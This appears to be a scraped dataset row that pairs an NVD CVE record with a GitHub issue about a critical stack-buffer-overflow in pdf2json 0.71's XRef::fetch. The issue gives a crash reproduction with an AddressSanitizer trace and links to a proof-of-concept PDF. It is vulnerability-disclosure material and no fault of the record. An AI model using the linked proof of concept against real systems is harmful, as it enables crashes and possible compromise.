"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2json"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/flexpaper/pdf2json/issues/45"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2json"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/flexpaper/pdf2json/issues/45"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flowpaper:pdf2json:0.71:*:*:*:*:*:*:*",
"matchCriteriaId": "04335321-68D4-408C-A751-7CBE39D6F9FC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/flexpaper/pdf2json/issues/45 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"flexpaper",
"pdf2json"
] | $ ./pdf2json 01-Stack-buffer-overflow-XRef-fetch.pdf
ASAN:SIGSEGV
=================================================================
==89368==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc9d6bcfe0 (pc 0x7f2cf5cba26e bp 0x000000000018 sp 0x7ffc9d6bcfd0 T0)
#0 0x7f2cf5cba26d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xb026d)
#1 0x7f2cf5cb9d67 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xafd67)
#2 0x7f2cf5c2cf4f (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22f4f)
#3 0x7f2cf5ca34fe in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x994fe)
#4 0x4345c4 in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:839
#5 0x434835 in ObjectStream::ObjectStream(XRef*, int) /home/test/pdf2json_tmp/xpdf/XRef.cc:84
#6 0x4345d6 in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:839
#7 0x434835 in ObjectStream::ObjectStream(XRef*, int) /home/test/pdf2json_tmp/xpdf/XRef.cc:84
#8 0x4345d6 in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:839
#9 0x434835 in ObjectStream::ObjectStream(XRef*, int) /home/test/pdf2json_tmp/xpdf/XRef.cc:84
#10 0x4345d6 in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:839
#11 0x434835 in ObjectStream::ObjectStream(XRef*, int) /home/test/pdf2json_tmp/xpdf/XRef.cc:84
ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2json
[01-Stack-buffer-overflow-XRef-fetch.pdf](https://github.com/flexpaper/pdf2json/files/4895938/01-Stack-buffer-overflow-XRef-fetch.pdf)
| Stack-buffer-overflow-XRef-fetch | https://api.github.com/repos/flexpaper/pdf2json/issues/45/comments | 0 | 2020-07-09T09:56:14Z | 2020-07-09T09:56:14Z | https://github.com/flexpaper/pdf2json/issues/45 | 653,929,593 | 45 | 2,777 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.